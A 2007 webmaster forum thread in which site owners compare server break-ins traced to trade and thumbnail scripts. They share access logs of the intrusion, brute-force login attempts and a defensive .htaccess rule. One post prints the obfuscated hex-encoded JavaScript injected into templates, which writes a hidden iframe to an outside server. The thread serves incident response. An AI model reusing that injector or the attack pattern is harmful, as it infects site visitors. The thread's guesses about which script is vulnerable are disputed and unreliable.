We need to talk SECURITY!!! NOW!!

**The Professional** · December 5th, 2007, 01:23 PM

Originally Posted by rowan

Are you on a managed box?

Is your OS, Apache, PHP etc upgraded to the latest version?

Are you using a control panel which may also need to be upgraded?

What other third party scripts exist on this box? If you've had it for a while, think back to scripts that you may not use any more, but are still located on the server.

Hey Rowan...

I'm running CentOS, and I believe that Apache and PHP are upgraded to the latest version. I"m hosted over at yellowfiber, but am not fully managed. I dont' use a control panel.

Scripts that I have still are:
ATX
ST
Arylia
Gallery Daemon
linkex
EPT

I've just removed old copies of AT3 I don't use anymore.

I will check things out here though it seems the hack first started on my teenielips.com site where I had atx/st/linkex

digging deeper today but very much would value your assistance .... I know you're a guru

**The Professional** · December 5th, 2007, 01:25 PM

oh... and I use to have slothtrader on there too

**The Professional** · December 5th, 2007, 04:21 PM

bump

**pbracc** · December 5th, 2007, 06:17 PM

just hacked another of my sites, one had been 3 weeks ago, obviously ive changed all the passes. This is the ip who got into my AT3: 208.53.158.26, i remember the last time was a similar ip, the first number was maybe the same or 207, dont remember exactly.

But looks like it's getting popular to try to get into my script, here's somebody who tried some id/pass manually:
69.93.211.234 tried to login with webmaster / pass.
20:31 - 04 Dec 69.93.211.234 tried to login with atx / admin.
20:30 - 04 Dec 69.93.211.234 tried to login with admin / p@ssword.
20:27 - 04 Dec 69.93.211.234 tried to login with admin / asdfgh.
20:25 - 04 Dec 69.93.211.234 tried to login with admin / qwerty.
20:23 - 04 Dec 69.93.211.234 tried to login with admin / 123456.
20:22 - 04 Dec 69.93.211.234 tried to login with admin / password.
20:19 - 04 Dec 69.93.211.234 tried to login with admin / admin.
20:17 - 04 Dec 69.93.211.234 tried to login with admin / pass.
20:14 - 04 Dec 69.93.211.234 tried to login with user / pass.

He obviously couldnt get in, but it's funny

**The Professional** · December 5th, 2007, 07:14 PM

pbracc that's the same ip that's been up to this all along... I've been talking with my admin and think we will have some news for you soon

**Spudstr** · December 5th, 2007, 07:17 PM

I believe there is a security problem with at3.

208.53.158.26 - - [05/Dec/2007:10:25:27 -0500] "GET /cgi-bin/atx/x/admin.cgi?id=41 HTTP/1.0" 200 20497 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.53.158.26 - - [05/Dec/2007:10:25:28 -0500] "GET /cgi-bin/atx/x/admin.cgi?id=41 HTTP/1.0" 200 19590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.53.158.26 - - [05/Dec/2007:10:25:29 -0500] "GET /cgi-bin/at3/admin.cgi?id=13 HTTP/1.0" 200 16069 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.53.158.26 - - [05/Dec/2007:10:25:31 -0500] "GET / HTTP/1.0" 200 146094 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.53.158.26 - - [05/Dec/2007:10:25:33 -0500] "GET / HTTP/1.0" 200 78044 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.53.158.26 - - [05/Dec/2007:10:25:36 -0500] "POST /cgi-bin/atx/x/x2.cgi HTTP/1.0" 200 1935 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.53.158.26 - - [05/Dec/2007:10:25:38 -0500] "POST /cgi-bin/at3/x/x2.cgi HTTP/1.0" 200 2250 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.53.158.26 - - [05/Dec/2007:10:25:40 -0500] "GET /images/backup.php?l=1 HTTP/1.0" 200 54 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.53.158.26 - - [05/Dec/2007:10:25:42 -0500] "GET /images/backup.php?l=1 HTTP/1.0" 200 52 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.53.158.26 - - [05/Dec/2007:10:25:46 -0500] "GET /images/backup.php?l=2 HTTP/1.0" 200 54 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.53.158.26 - - [05/Dec/2007:10:25:49 -0500] "GET /images/backup.php?l=2 HTTP/1.0" 200 52 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.53.158.26 - - [05/Dec/2007:10:25:50 -0500] "GET /images/backup.php?l=3 HTTP/1.0" 200 56 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.53.158.26 - - [05/Dec/2007:10:25:52 -0500] "GET /images/backup.php?l=3 HTTP/1.0" 200 55 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.53.158.26 - - [05/Dec/2007:10:25:56 -0500] "POST /cgi-bin/atx/x/x2.cgi HTTP/1.0" 200 1935 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.53.158.26 - - [05/Dec/2007:10:25:56 -0500] "POST /cgi-bin/at3/x/x2.cgi HTTP/1.0" 200 2250 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

backup.php script is empty at the moment.

the IP resolves to a netblock with fdcservers.com I suggest anyone running at3 to check their stuff/logs for this IP and post it in here.

**miroz** · December 5th, 2007, 11:23 PM

Originally Posted by Spudstr

I believe there is a security problem with at3.

But I have no at3 at my hacked domain

**Niclu** · December 6th, 2007, 05:08 AM

I got hit too on one of my domains today. I do not have ATX & ST on that site, but Trade Expert, so I have a hard time believing that the trade/thumb scripts we are using are the reason to all this.

**truawm** · December 6th, 2007, 05:17 AM

It seems like the hole is in x2.cgi. My logs looked exactly the same as Spudstr's ones. Two requests on x2.cgi and then requests on backup.php (this one created by the hole on v2.cgi, I guess, because backup.php was never there before).

Also this time i found this in /var/log/messages:
---- cut -------
kernel: pid 56849 (x2.cgi), uid 1003: exited on signal 11 (core dumped) ---- end cut -------

So here is a vanilla .htaccess rule that will allow requests on x2.cgi from your own IPs only and block others. Just place it in the same dir where x2.cgi resides.

<Files x2.cgi>
Order allow,deny
Allow from 10.10.10.10 20.20.20.20
</Files>

**Spudstr** · December 6th, 2007, 05:17 AM

Originally Posted by Niclu

I got hit too on one of my domains today. I do not have ATX & ST on that site, but Trade Expert, so I have a hard time believing that the trade/thumb scripts we are using are the reason to all this.

No but what was the code in your scripts? need to compare apples to apples and not to other hacks/exploits.

**Niclu** · December 6th, 2007, 05:59 AM

Originally Posted by Spudstr

No but what was the code in your scripts? need to compare apples to apples and not to other hacks/exploits.

Well, first I couldnt find the code, but after seeing a difference in the size of the hacked file, and the original file I knew something was wrong. The only way for me to finally see the code, was in Ultra Edit32 to select all the code, and then "Convert Wrap to CR/LFs". I have no idea what that wrap function is doing, but after I did that this code appeared.

Code:

var
s='3C696672616D65207372633D22687474703A2F2F3139352E352E3131362E3235302F65782F7374617469632E706870222077696474683D32206865696768743D3220737
4796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); 
o=o+c+s.substr(i,2);} document.write(unescape(o));

**Venom** · December 6th, 2007, 06:05 AM

haha i was fucked by this fuckin shit on Dec 4,lol and caught it just today,holy shit

**Aheib** · December 6th, 2007, 06:07 AM

i've been following this, but so far i haven't been able to cross reference the hacks to a single common script. Unless not everybody is listing every script.
Anyway, just to rule atx out, i've added encryption to the next build.

Spudstr, please only post messages about holes in AT3 if you have hard evidence, not because you believe it. Thats very damaging...
Contact me if you have any logs that could help.

**The Professional** · December 6th, 2007, 07:07 AM

bump.... thanks to all who are investigating

**Therapy** · December 6th, 2007, 09:30 AM

Big thankyou Spudstr for looking into this. Now is there anything we can do to stop this happen again while we wait for a patch?

**The Professional** · December 6th, 2007, 10:16 AM

so myself and TNT both got hit again last night!!!
not sure how or what just yet.... stay tuned

**Niclu** · December 6th, 2007, 03:31 PM

Ouch, a couple of other domains on my server was hacked as well I just found out. I use ST/ATX on those sites, and as usual the ST template files were modified

**StickyGreen** · December 6th, 2007, 03:41 PM

I found that exact script code in every single one of my smart thumbs templates on my webair server! What the fuck!?!?! This is such bullshit man...

I have no clue what to do. I deleted them all last night but then today the code reappeared. Fucking bullshit...

**The Professional** · December 6th, 2007, 04:06 PM

yes it seems to happen everynight to me as well... I recommend chmodding your templates to 444 after you've cleaned them... and maybe setting the amount of clicks till template refresh a little lower..

it seems the hacker has been attacking the mainpages directly now on some of my sites grabbing some traffic before they are over written by a clean template

**miroz** · December 7th, 2007, 12:27 AM

Guys, but what about me? I am not using ST and getting same shit on my AGS templates

Thread: We need to talk SECURITY!!! NOW!!

Thread Tools

Posting Permissions